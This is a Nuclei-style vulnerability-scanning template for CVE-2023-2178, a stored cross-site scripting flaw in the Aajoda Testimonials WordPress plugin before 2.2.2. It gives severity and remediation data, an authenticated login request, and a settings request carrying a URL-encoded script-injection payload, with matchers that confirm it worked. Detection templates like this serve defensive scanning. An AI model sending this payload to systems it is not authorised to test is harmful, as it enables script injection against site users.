id: CVE-2023-2178

info:
  name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting
  author: Farish
  severity: medium
  description: |
    The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
    - https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2178
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2023-2178
    cwe-id: CWE-79
    epss-score: 0.00078
    epss-percentile: 0.3232
    cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: aajoda
    product: aajoda_testimonials
    framework: wordpress
  tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, ">")'
          - 'contains(body_2, "page_aajoda-testimonials")'
        condition: and
# digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950